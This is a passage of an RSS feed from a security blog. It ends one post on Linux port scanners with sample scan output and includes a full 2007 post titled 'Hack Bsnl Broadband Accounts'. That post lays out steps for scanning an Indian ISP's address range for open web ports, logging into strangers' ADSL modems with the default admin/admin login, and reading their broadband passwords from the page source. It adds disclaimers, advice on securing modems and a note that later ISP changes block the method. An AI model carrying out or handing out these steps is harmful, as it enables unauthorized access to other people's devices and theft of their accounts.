<p><a target="_blank" href="http://www.umitproject.org/screenshots/umit1.png" ><img src="http://www.umitproject.org/screenshots/umit1.png" style="width:600px;"></a></p>
<p><strong>3. pnscan</strong></p>
<p>Install : sudo apt-get install pnscan</p>
<blockquote><p>Pnscan is a multi threaded port scanner that can scan a large network very quickly. If does not have all the features that nmap have but is much faster.</p></blockquote>
<p>Usage : </p>
<pre class="brush: cpp; title: Code; notranslate">
desktop:~$ pnscan 192.168.1:192.168.1.2 1:255
192.168.1.2     :    21 : TXT : 220 (vsFTPd 2.3.2)\r\n
192.168.1.2     :    22 : TXT : SSH-2.0-OpenSSH_5.8p1 Debian-1ubuntu3\r\n
</pre>
<p><strong>4. knocker</strong></p>
<p>Install : sudo apt-get install knocker</p>
<p>Usage :</p>
<pre class="brush: cpp; title: Code; notranslate">
desktop:~$ knocker --host 192.168.1.2  --start-port 1 --end-port 2600 -nc

+-----------------------------------------------------------------------------+
|--=| k n o c k e r -- t h e -- n e t -- p o r t s c a n n e r |=-=[ 0.7.1 ]=-|
+-----------------------------------------------------------------------------+

 - started by user enlightened on Sun Oct 23 19:27:42 2011

 - hostname to scan: 192.168.1.2
 - resolved host ip: 192.168.1.2
 - - scan from port: 1
 - - - scan to port: 2600
 - - - -  scan type: tcp connect

+=- - - - - - - - - - - - - - - - - - - - - - - - - - - - -  s c a n n i n g  -

 -=[ 21/tcp, ftp ]=- * OPEN *
 -=[ 22/tcp, ssh ]=- * OPEN *
 -=[ 80/tcp, www ]=- * OPEN *
 -=[ 631/tcp, ipp ]=- * OPEN *

+=- - - - - - - - - - - - - - - - - - - - - - - - - - - -  c o m p l e t e d  -

 - scanned host name: 192.168.1.2 IP: 192.168.1.2

 - found 4 open ports in a total of 2600 ports scanned.

 - port scan completed in 0.04 seconds.
</pre>
<img src="http://www.binarytides.com/blog/?ak_action=api_record_view&id=605&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.binarytides.com/blog/top-port-scanners-on-ubuntu-linux/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Hack Bsnl Broadband Accounts</title>
		<link>http://www.binarytides.com/blog/hack-bsnl-broadband-accounts/</link>
		<comments>http://www.binarytides.com/blog/hack-bsnl-broadband-accounts/#comments</comments>
		<pubDate>Sat, 11 Aug 2007 14:08:00 +0000</pubDate>
		<dc:creator>Binary Tides</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[networking]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://www.binarytides.com/blog/?p=15</guid>
		<description><![CDATA[Disclaimer : The information provided below is for educational purpose only. The author is not responsible for any misuse of the information and discourages any illegal use of it. Bsnl DataOne Broadband continues to grow as one the most popular broadband services in India with high speed facilities of upto 2 mpbs. But a large number of users of this service are vulnerable to hacker attacks because discovering and hacking the vulnerable victims of this [...]]]></description>
			<content:encoded><![CDATA[<p><b>Disclaimer : The information provided below is for educational purpose only. The author is not responsible for any misuse of the information and discourages any illegal use of it.</b></p>
<p>Bsnl DataOne Broadband continues to grow as one the most popular broadband services in India with high speed facilities of upto 2 mpbs. But a large number of users of this service are vulnerable to hacker attacks because discovering and hacking the vulnerable victims of this network is shockingly simple. If you are a Bsnl Broadband user then immediately assess the security of your internet connection and take appropriate steps to secure yourself.</p>
<p>First lets see how simple it is to hack bsnl dataone broadband usernames and passwords. For this you shall need a ipscanner tool called Angry IP Scanner http://www.angryziber.com/ipscan/ or anything similar.</p>
<p>Ok so lets begin&#8230; </p>
<p>Get your IP from : <a target="_blank" href="http://www.ipmango.com/"><br />
<h3>www.ipmango.com</h3>
<p></a></p>
<p><b>Step 1 : </b></p>
<p>Start Angry IP scanner and goto options > ports. Type in 80 in the first ports textbox and click ok.<a target="_blank" href="http://bp1.blogger.com/_y5Z8wyEG7ZA/Rr2_dMgO3qI/AAAAAAAAABA/kZl1iH520D0/s1600-h/port80.JPG" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" ><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp1.blogger.com/_y5Z8wyEG7ZA/Rr2_dMgO3qI/AAAAAAAAABA/kZl1iH520D0/s400/port80.JPG" alt="" id="BLOGGER_PHOTO_ID_5097440861546798754" border="0" /></a><a target="_blank" href="http://bp1.blogger.com/_y5Z8wyEG7ZA/Rr2_dMgO3pI/AAAAAAAAAA4/TLP9uqkF5ww/s1600-h/openport.JPG" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" ><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp1.blogger.com/_y5Z8wyEG7ZA/Rr2_dMgO3pI/AAAAAAAAAA4/TLP9uqkF5ww/s400/openport.JPG" alt="" id="BLOGGER_PHOTO_ID_5097440861546798738" border="0" /></a><br />Then goto options > options ; in the display section select &#8220;only open ports&#8221; and click ok&amp;save.</p>
<p>Now on the main screen put in the ip scan range as something 59.*.0.0 &#8211; 59.*.255.255 (for e.g. 59.95.2.3) and click the start button. And the list that shall follow next are the victims. In this example we choose the range 59.95.0.0 &#8211; 59.95.255.255. You will be surprised at the number of victims you discover.</p>
<p><b>Step 2 : </b></p>
<p>Pick the ip-address of any of them and open up your browser and type in http://59.*.*.* (the * should be replaced by the values from the ip you are using. A box will popup asking for username and password. Enter the username : admin and password : admin .There is a high chance that you will be able to login with that username and password.<br />admin-admin is the default username and password that is set while manufacturing the adsl modem devices.</p>
<p>What follows next is the modem administration panel.<br />
Simply search for the &#8220;WAN&#8221; option and click it. On the next page you will find the username and password of that user. now right-click on the page and click view source. in Mozilla/Opera This frame -> view frame source</p>
<p>Now in the source code search for this : INPUT TYPE=&#8221;PASSWORD&#8221;<br />
<input name="connection0:pppoe:settings/password" value="password" id="uiPostPppoePassword" type="hidden">
<p>and the value field of this input element will have the password
<p class="MsoNormal">if its not there as in case of D-Link DSL 502T ADSL Routers the search for this </p>
<p class="MsoNormal">
<input name="connection0:pppoe:settings/password" style="" type="hidden"><span style="">input type=&#8221;hidden&#8221; name=&#8221;connection0:pppoe:settings/password&#8221;<span style="">         </span>value=&#8221;password&#8221; id=&#8221;uiPostPppoePassword&#8221;</span></p>
<p class="MsoNormal">and the value field will have the password</p>
<p>  Well each steps take less than 1 minute so getting username passwords wont take even 2 minutes and is easier than sending a mail.</p>
<p>And this exposes the weak security of bsnl broadband users.</p>
<p>Well this is not a weakness but more of a mis-configuration which leads to insecurity. If you understand networking then you would probably realise that it was merely logging into the remote administration service of the modem and nothing else. This was not really hacking but a simple search of victims who are absolutely ignorant of their weak security on the internet.</p>
<p>Most routers have an option where remote management can be disabled. In other words, you can only connect to the configuration interface from the internal network, not the WAN(Internet) side. You would definitely want to make sure remote management is not active to protect yourself.</p>
<p>Note : On SmartAX MT880 eventhough Remote Management is disabled , it permits remote logins from over the Internet. So change your mode administration passwords immediately.</p>
<p>The problem is that the professionals at Bsnl are ignorant of such simplicity of networking and unable to advise the users or guide them to take proper security measures leaving their customers and themselves absolutely unsecure.</p>
<p>Now lets check a few more options related to this issue. A bsnl broadband modem can be used in two modes. RFC Bridged mode and pppoe mode.</p>
<p>In the RFC Bridged mode the device behaves like a modem device that is attached to your computer and you use some dialup software to dial into the isp through this modem.This is PPPOE from the PC and the adsl device is a good modem. This mode is safer as the username password are on your pc and nothing is on the modem.</p>
<p>In the PPPOE mode the adsl device becomes a router &#8211; a distinct network device with many features enabled. In this mode the username password is stored in the modem which will dial to the isp and establish the internet connectivity. The computers will just connect to this router who would be their primary gateway. Now this is the mode where the risk exists.</p>
<p>If remote administration is enabled the remote users from the internet can login to this modems administration panel. Now the main problem is the default admin username-password which most users dont change due to ignorance. &#8220;admin-admin&#8221; is pair that works in most cases giving you full access to the modems internals. What follows next is simple as drinking a glass of orange juice.</p>
<p>Many users install firewalls and think they are safe, but they fail to understand that the firewall protects their PC not the &#8220;router&#8221; since the topology is like</p>
<p>(PC)  -> router -> internet</p>
<p><b>So how should you secure yourself ?</b></p>
<p><span style="color: rgb(255, 0, 0);">1.</span> Use RFC Bridged mode if it is sufficient for you.</p>
<p><span style="color: rgb(255, 0, 0);">2.</span> Change the default admin password of your modem.</p>
<p><span style="color: rgb(255, 0, 0);">3.</span> Disable wan ping reply . ( this will prevent the hackers from directly discovering your pc when it is on the internet)</p>
<p><span style="color: rgb(255, 0, 0);">4.</span> Disable remote configuration feature.</p>
<p><span style="color: rgb(255, 0, 0);">5.</span> Check your broadband usage on a regular basis and compare it with your own surfing schedules to check whether someone else has used it or not. If suspiscious usage is indicated then immediately change your bband password as well. Or a better suggestion would be to change broadband passwords on a regular basis.</p>
<p>Try to spread the security awareness to your friends and other relatives who are using Bsnl broadband and encourage them to secure their internet connectivity.</p>
<p><b>Disclaimer : The information provided above is for educational purpose only. The main purpose of the author is to spread awareness amongst users. The author is not responsible for any misuse of the information and discourages any illegal use of it.</b></p>
<p><em>Update &#8211; 09-11-2011</em></p>
<p>Bsnl has implemented a technique called Port Binding, which will bind a particular username to its phone number. Then that username will only work via that phone number. Hence the above hacking method will become ineffective.<br />
Port Binding is slowly being implemented by Bsnl over all cities and soon would cover the whole Broadband network across the country, making it more secure.</p>
<img src="http://www.binarytides.com/blog/?ak_action=api_record_view&id=15&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.binarytides.com/blog/hack-bsnl-broadband-accounts/feed/</wfw:commentRss>
		<slash:comments>154</slash:comments>
		</item>
	</channel>
</rss>

